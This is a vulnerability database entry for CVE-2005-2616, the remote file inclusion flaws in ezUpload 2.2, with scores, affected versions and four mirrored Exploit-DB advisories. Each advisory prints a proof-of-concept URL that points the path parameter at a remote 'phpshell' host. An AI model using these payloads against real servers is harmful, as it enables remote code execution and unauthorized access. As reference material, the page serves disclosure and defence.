CVE-2005-2616
published 2005-08-17CVE-2005-2616: Multiple PHP file include vulnerabilities in ezUpload 2.2 allow remote attackers to execute arbitrary code via the path parameter to (1) initialize.php, (2)…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
11.45%
95.5th percentile
Multiple PHP file include vulnerabilities in ezUpload 2.2 allow remote attackers to execute arbitrary code via the path parameter to (1) initialize.php, (2) customize.php, (3) form.php, or (4) index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ezupload | ezupload | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ezUpload 2.2 - 'form.php?path' Remote File Inclusion
exploitdb·2005-08-10
CVE-2005-2616 ezUpload 2.2 - 'form.php?path' Remote File Inclusion
ezUpload 2.2 - 'form.php?path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/14534/info
ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/ezupload/form.php?path=http://www.example.com/phpshell?&
Exploit-DB
ezUpload 2.2 - 'index.php?path' Remote File Inclusion
exploitdb·2005-08-10
CVE-2005-2616 ezUpload 2.2 - 'index.php?path' Remote File Inclusion
ezUpload 2.2 - 'index.php?path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/14534/info
ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/ezupload/index.php?path=http://www.example.com/phpshell?&
Exploit-DB
ezUpload 2.2 - 'initialize.php?path' Remote File Inclusion
exploitdb·2005-08-10
CVE-2005-2616 ezUpload 2.2 - 'initialize.php?path' Remote File Inclusion
ezUpload 2.2 - 'initialize.php?path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/14534/info
ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/ezupload/initialize.php?path=http://www.example.com/phpshell?&
Exploit-DB
ezUpload 2.2 - 'customize.php?path' Remote File Inclusion
exploitdb·2005-08-10
CVE-2005-2616 ezUpload 2.2 - 'customize.php?path' Remote File Inclusion
ezUpload 2.2 - 'customize.php?path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/14534/info
ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/ezupload/customize.php?path=http://www.example.com/phpshell?&
No writeups or analysis indexed.
http://packetstorm.linuxsecurity.com/0508-exploits/ezuploadRemote.txthttp://secunia.com/advisories/16434http://securitytracker.com/id?1014723http://www.securiteam.com/exploits/5JP0J15GKU.htmlhttp://www.securityfocus.com/bid/14534http://www.vupen.com/english/advisories/2005/1379http://packetstorm.linuxsecurity.com/0508-exploits/ezuploadRemote.txthttp://secunia.com/advisories/16434http://securitytracker.com/id?1014723http://www.securiteam.com/exploits/5JP0J15GKU.htmlhttp://www.securityfocus.com/bid/14534http://www.vupen.com/english/advisories/2005/1379
2005-08-17
Published